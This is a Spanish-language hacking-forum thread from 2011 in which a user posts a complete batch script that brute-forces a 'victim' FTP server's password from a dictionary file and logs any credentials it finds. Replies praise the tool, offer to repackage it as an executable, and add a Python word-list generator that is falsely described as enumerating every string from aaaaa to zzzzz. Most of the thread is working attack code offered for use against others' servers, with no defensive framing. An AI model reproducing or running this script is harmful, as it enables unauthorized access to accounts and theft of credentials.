elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [BATCH] Crackeador de FTP en .bat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [BATCH] Crackeador de FTP en .bat  (Leído 4,944 veces)
AlxSpy

Desconectado Desconectado

Mensajes: 137


Ver Perfil
[BATCH] Crackeador de FTP en .bat
« en: 6 Abril 2011, 01:53 am »

hola hice este crackeador 100% en .bat , ya lo probe y funciona bien, algunas imagenes:

menu principal
http://www.imagecross.com/11/image-hosting-view-64.php?id=1123Menu.jpg

ingreso de datos
http://www.imagecross.com/11/image-hosting-view-64.php?id=4315Inicio.jpg

clave descifrada
http://www.imagecross.com/11/image-hosting-view-64.php?id=3898Password.jpg

ahora el codigo


Código:
@ echo off
title Crackeador - FTP :::::::: AlxSpy
color 0a
set cont=0
set num=1
md C:\Crackeador-FTP\
md C:\Crackeador-FTP\Login
md C:\Crackeador-FTP\Residuo
md C:\Crackeador-FTP\Password
del /q C:\Crackeador-FTP\Login
del /q C:\Crackeador-FTP\Residuo
:Menu
set opcion=4
cls
echo.
echo                        Menu Principal
echo.
echo.
echo                        Opciones:
echo.
echo.
echo                       1-Leeme, instrucciones
echo                       2-Iniciar crackeador
echo                       3-Salir
echo.
echo ___________________________________________________________________
set /p opcion=
if "%opcion%" == "1" goto Manual
if "%opcion%" == "2" goto Inicio
if "%opcion%" == "3" (goto Salida) else goto menu

:Manual
cls
echo.
echo                       Leeme, instrucciones
echo.
echo.
echo              -Para hacer el Diccionario-listword, agrega
echo               tu lista de claves en tu fichero de texto:
echo               ".txt", debes agregar un salto de linea o
echo               [ENTER] al inicio de la lista y al final de
echo               la lista porque elprograma tomara la lista
echo               a partir de segunda linea hasta la penultima.
echo              -El nombre del fichero puede o no contener
echo               espacios.
echo              -Para detener el programa debes cerrar la
echo               consola.
echo              -Todos los ficheros que usa el programa estan
echo               en "C:\Crackeador-FTP", no quedara
echo               ningun fichero residuo en tus directorios
echo               principales, solo debes borrar:
echo               "C:\Crackeador-FTP" al terminar el prgrama.
echo              -La clave-password descifrado sera mostrado
echo               en la consola y almacenado en:
echo               "C:\Crackeador-FTP\Password"
echo.
echo.
echo              Pulsa una tecla para volver al menu principal
pause>nul
goto Menu
:Inicio
cls
echo.
echo                      Iniciar Crackeador [Paso 1/2]
echo.
echo.
echo             Para cancelar y volver al menu principal pulsa "C"
echo.
echo ___________________________________________________________________
set /p host=Ingresa el servidor FTP victima:
if "%host%" == "c" goto Menu
if "%host%" == "C" goto Menu
echo.
echo ___________________________________________________________________
set /p user=Ingresa el usuario victima:
if "%user%" == "c" goto Menu
if "%user%" == "C" goto Menu
echo.
echo ___________________________________________________________________
set /p dic=Ruta completa del Diccionario:
if "%dic%" == "c" goto Menu
if "%dic%" == "C" goto Menu
if exist "%dic%" (goto Inicio2) else goto error1
:error1
cls
echo.
echo          Error, no se encontro el fichero:
echo          "%dic%"
echo.
echo.
echo          Pulsa una tecla para volver
pause>nul
goto Inicio
:Inicio2
set opcion=4
copy /y "%dic%" C:\Crackeador-FTP\Diccionario.txt
ren C:\Crackeador-FTP\Diccionario.txt lista.txt
ren C:\Crackeador-FTP\lista.txt Diccionario.txt
echo FIN>>C:\Crackeador-FTP\Diccionario.txt
cls
echo.
echo                      Iniciar Crackeador [Paso 2/2]
echo.
echo.
echo         Datos y diccionario listos
echo         ¿Desea iniciar el crackeador ahora?
echo.
echo         1-Si
echo         2-No, volver al paso anterior
echo         3-No, volver al menu principal
echo.
echo ___________________________________________________________________
set /p opcion=
if "%opcion%" == "1" goto proceso
if "%opcion%" == "2" goto Inicio
if "%opcion%" == "3" (goto Menu) else goto Inicio2
:Proceso
set /a cont=%cont%+%num%
for /f "skip=%cont% tokens=1" %%a in (C:\Crackeador-FTP\Diccionario.txt) do call :Pass "%%a"
:Pass
set Pass=%1
set Pass=%Pass:"=%
if "%Pass%" == "FIN" (goto Fin) else goto Screen
:Screen
del /q C:\Crackeador-FTP\Login\Login.txt
del /q C:\Crackeador-FTP\Residuo\Residuo.txt
cls
echo.
echo.
echo                        Probando Password %cont%...
echo.
echo %user%>>C:\Crackeador-FTP\Login\Login.txt
echo %Pass%>>C:\Crackeador-FTP\Login\Login.txt
echo bye>>C:\Crackeador-FTP\Login\Login.txt
ftp -s:C:\Crackeador-FTP\Login\Login.txt %host%>>C:\Crackeador-FTP\Residuo\Residuo.txt
if exist C:\Crackeador-FTP\Residuo\Residuo.txt (goto CheckResult) else goto error2
:error2
msg *msg Fallo el comando FTP
cls
echo.
echo.
echo                           Fallo el comando FTP
echo.
echo.
echo              Pulse una tecla para volver al menu principal
pause>nul
goto Menu
:CheckResult
for /f "skip=5 tokens=1" %%a in (C:\Crackeador-FTP\Residuo\Residuo.txt) do call :txt "%%a"
:txt
set txt=%1
set txt=%txt:"=%
if "%txt%" == "530" (goto proceso) else goto Password
:Password
msg *msg Password localizado
cls
echo.
echo.
echo                            Password localizado
echo.
echo.
echo                         Servidor victima: %host%
echo                         Usuario victima: %user%
echo                         Password victima: %Pass%
echo.
echo.
echo               Pulse una tecla para volver al menu principal
pause>nul
echo Servidor: %host% / Usuario: %user% / Clave: %Pass%>>C:\Crackeador-FTP\Password\UsuariosyClaves.txt
goto Reset
:Fin
msg *msg Fin de busqueda sin resultados
goto reset
:Reset
set cont=0
del /q C:\Crackeador-FTP\*.txt
del /q C:\Crackeador-FTP\Login\*.txt
del /q C:\Crackeador-FTP\Residuo\*.txt
goto Menu
:Salida
exit


En línea

SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: [BATCH] Crackeador de FTP en .bat
« Respuesta #1 en: 6 Abril 2011, 05:24 am »

un crackeador ftp he? mMmmMm interesante, gracias por el aporte!!!

me habria gustado que lo hubieras subido con tu diccionario jaja, saludos!


En línea

No he vuelto, solo estoy de paso.
AlxSpy

Desconectado Desconectado

Mensajes: 137


Ver Perfil
Re: [BATCH] Crackeador de FTP en .bat
« Respuesta #2 en: 7 Abril 2011, 15:37 pm »

para la proxima pongo un diccionario...  :xD :xD, o mejor para la proxima saco un generador de palabras para hacer un diccionario.
salu2
En línea

SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: [BATCH] Crackeador de FTP en .bat
« Respuesta #3 en: 7 Abril 2011, 15:47 pm »

Te importa si hago tu script .Executable y lo subo a mi post de la chincheta?  :rolleyes: creo que lo subiré junto con el jhon the ripper xD
En línea

No he vuelto, solo estoy de paso.
AlxSpy

Desconectado Desconectado

Mensajes: 137


Ver Perfil
Re: [BATCH] Crackeador de FTP en .bat
« Respuesta #4 en: 8 Abril 2011, 17:34 pm »

no hay problema, subelo.
En línea

user_foro

Desconectado Desconectado

Mensajes: 28



Ver Perfil
Re: [BATCH] Crackeador de FTP en .bat
« Respuesta #5 en: 26 Mayo 2011, 00:25 am »

Y... Como se hace el dicho: Diccionario-listword.txt

El contenido de dicho txt

Se agradece...!!!
En línea

kiriost

Desconectado Desconectado

Mensajes: 58


www.godsys.com.ar Hacking y Programación


Ver Perfil WWW
Re: [BATCH] Crackeador de FTP en .bat
« Respuesta #6 en: 27 Mayo 2011, 01:14 am »

La verdad que bastante bueno y bastante práctico.

Si te gusta todo esto de crackers estudiá sobre "Sockets" en algún lenguaje que es más rápido y no tenés que depender del programa "ftp". (es solo un consejo) :)

Para crear el diccionario-passwords.txt hay que crearlo a mano escribiendo palabra por palabra y haciendo una lista de estas. O sea, escribis una palabra debajo de la otra para que el programa las vaya probando como passwords.
Aquí les dejo un generador de palabras en Python que te genera todas las palabras posible entre aaaaa y zzzzz:
Código
  1. #Autor: Kiriost
  2. import random
  3.  
  4. class BruteForce:
  5. def __init__(self):
  6. self.abc = "aabcdeefghiijklmnoopqrstuuvwxyz"
  7. self.num = "0123456789"
  8. self.buff = ""
  9.  
  10. def WordGEN(self):
  11. cn = random.random()*10
  12. word = ""
  13. while(cn>0):
  14. word = word + self.abc[int(random.random()*len(self.abc))]
  15. cn = cn-1
  16. self.buff = word
  17. return self.buff
  18.  
  19. def NumGEN(self):
  20. cn = random.random()*10
  21. word = ""
  22. while(cn>0):
  23. word = word + self.num[int(random.random()*len(self.num))]
  24. cn = cn-1
  25. self.buff = word
  26. return self.buff
  27.  
  28. brute = BruteForce()
  29. file = open("word-list.txt", "w")
  30. for x in range(0, 99999):
  31.    brute.WordGEN()
  32.    file.write(brute.buff+"\n")
  33. file.close()
  34.  

Esto va a crear un archivo llamado "word-lis.txt" con millones de palabras para usarlas. Solo necesitan tener python para ejecutar este script.
« Última modificación: 27 Mayo 2011, 01:36 am por kiriost » En línea

http://www.godsys.com.ar > Programación. Hacking y Cracking. Sistemas. Desarrollo Web.
Java, C/C++, PHP, Python, Perl, HTML, Game-Hacking, Defacing, Desarrollo Web, GNU/Linux, y más
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Crackeador en VB, como?? « 1 2 »
Programación Visual Basic
Hendrix 18 5,043 Último mensaje 17 Abril 2006, 21:15 pm
por Meg
web crackeador o injector vb6
Programación Visual Basic
xakalw00f 0 1,600 Último mensaje 28 Mayo 2008, 04:40 am
por xakalw00f
WPA crackeador con diccionario
Hacking Wireless
Heolo 8 7,220 Último mensaje 14 Mayo 2015, 03:44 am
por Heolo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines